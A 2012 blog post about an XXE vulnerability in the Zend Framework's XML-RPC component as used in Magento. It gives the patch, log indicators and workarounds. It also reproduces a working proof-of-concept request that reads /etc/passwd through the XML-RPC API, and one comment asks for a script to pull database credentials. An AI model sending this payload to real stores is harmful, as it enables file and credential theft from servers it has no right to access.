Friday, July 6, 2012

Magento / Zend Framework Vulnerability


There is a serious or critical vulnerability in the Zend Framework which Magento relies heavily on. For those of you not familiar with Magento it is both and Open Source and Enterprise E-commerce platform. Those utilizing Magento's XMLRPC API's will be vulnerable to the Zend Platform XML RPC package vulnerability.

Magento has released a bulletin http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability which advises all of it's users to apply a patch which was released yesterday by Magento which is 10 Days after the release by ZEND http://devzone.zend.com/2397/zend-framework-1-11-12-released/

Why am I writing about a disclosure that is 11 days old ? well Magento is a heavily used product out there and those using it may not be aware an official patch was released yesterday by the company. I also believe we should freely share what is found and help users out there mitigate the risks.

Disclosure:

Credit for discovering the vulnerability goes to the team at SEC Consult Vulnerability Lab Johannes Greil and Kestutis Gudinavicius

Proof of Concept: 
Credit SEC Consult Vulnerability Lab https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt

Magento :

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName> 
</methodCall> 


Example using SOAPUI request


As you can see above i was able to retrieve the "/etc/passwd" file from the system using a call to the XMLRPC API on Magento.

Solution:

Patch your systems immediately!!!

Magento has made the patches available (above link) in their solution section for both the community and Enterprise Editions as of yesterday. You can do this live with little impact to your site. If you are using cache just make sure to flush that or restart your apache server

How do I know if I have already fallen victim to this vulnerability ?
This will be tough to tell, if you do not use the XMLRPC Magento API look for POST requests to the API per the below in your access logs


192.168.23.1 - - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"

What if I cannot patch this right now and want to protect myself even though I am not using the Magento XMLRPC API ?

Well you have two options one is to follow Magento's workaround below

Workaround (taken from the magento blog post)

If the patch cannot be applied immediately, the following instructions can be followed to temporarily disable the RPC functionality that contains the vulnerability. Please be advised, any integrations that rely on the XMLRPC API functionality will no longer work after this workaround is implemented.
  • 1. On the Magento web server, navigate to the www-root where Magento app files are stored.
  • 2. In the wwwroot, navigate to /app/code/core/Mage/Api/controllers.
  • 3. Open XmlrpcController.php for editing.
  • 4. Comment out or delete the body of the method: public indexAction()
  • 5. Save the changes

Optional Workaround
Deny access to the XMLRPC API URI either via apache (rewrite/LocationMatch) or if you are using ModSecurity use that.

URI: /index.php/api/xmlrpc

References:
http://devzone.zend.com/2397/zend-framework-1-11-12-released/
http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability
https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt

Special Thanks to @thronic for bringing this vulnerability to my attention today, great PHP developer if you are looking for one.

6 comments:

  1. Hi,

    What about the Config informations is possible to see it using this expoit? if yes please tell us how to test it here

    ReplyDelete
    Replies
    1. Are you asking for a script to be able to test this against your site ?

      Delete
  2. Yes if there is any script, i wanna test my website and my clients websites too, ( show the config : Host & Database name & Username & Password ..), Thanks for your help

    ReplyDelete
  3. I think this article is a lot more relevant in these times. With companies looking to advertise through the most cost effective mediums - Magento certified developers Adelaide

    ReplyDelete
  4. Great Read! I am impressed on how you make your article easy to understand. I'll come back for more :D

    Japs Buidon is a Social Media Specialist and SEO from a renowned Magento Development Company in Florida. He loves hiking as well as electronics.

    ReplyDelete
  5. Yes, I also faced the problem of magento vulnerability, I had to put a patch for better protection. On a magento platform, I've been working relatively recently, but I've already discovered some problems. Not the first time a template is designed for the magento system, many colleagues also complained about the same problems

    ReplyDelete

 
© Bruce Martins
All rights reserved
Bloggerized by Free Blogger Templates
Instruction by Blog Teacher